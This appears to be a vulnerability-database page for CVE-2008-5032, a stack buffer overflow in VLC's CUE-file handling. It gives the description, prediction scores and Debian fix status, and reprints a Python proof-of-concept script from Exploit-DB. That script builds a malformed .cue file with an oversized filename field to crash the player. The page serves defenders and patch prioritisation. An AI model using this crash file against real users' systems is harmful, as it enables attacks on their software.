CVE-2008-5032

VIR risk: 1.0

Description

Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.

Predictions

Exploit likelihood: 20%
Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9686 · dos · windows · verified · python · 1 KB
Author: Dr_IDE · 2009-09-15

VideoLAN VLC Media Player < 0.9.6 - 'CUE' Local Buffer Overflow (PoC)

Python PoC, source: Exploit-DB
#!/usr/bin/env python

####################################################################################
#
# VLC Media Player < 0.9.6 (.CUE) Buffer Overflow PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3
#
####################################################################################

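# Start of the CUE sheet: the bytes spell 'FILE "' (opening of the quoted filename)
head = ("\x46\x49\x4c\x45\x20\x22")
# 10000 'A' bytes placed where the filename belongs
buff = ("\x41" * 10000)
# Rest of the sheet: '.BIN" BINARY', then the ' TRACK 01 MODE1/2352'
# and '   INDEX 01 00:00:00' lines, separated by CRLF
foot = (
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20\x54"
"\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32\x33"
"\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31\x20"
"\x30\x30\x3a\x30\x30\x3a\x30\x30")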

f1 = open("vlc_0.8.6.cue","w")
f1.write(head + buff + foot)
f1.close()

# milw0rm.com [2009-09-15]

OS impact

Debian: Fixed (5 releases)

Version     Status   Fixed in
trixie      Fixed    0.8.6.h-5
sid         Fixed    0.8.6.h-5
forky       Fixed    0.8.6.h-5
bullseye    Fixed    0.8.6.h-5
bookworm    Fixed    0.8.6.h-5
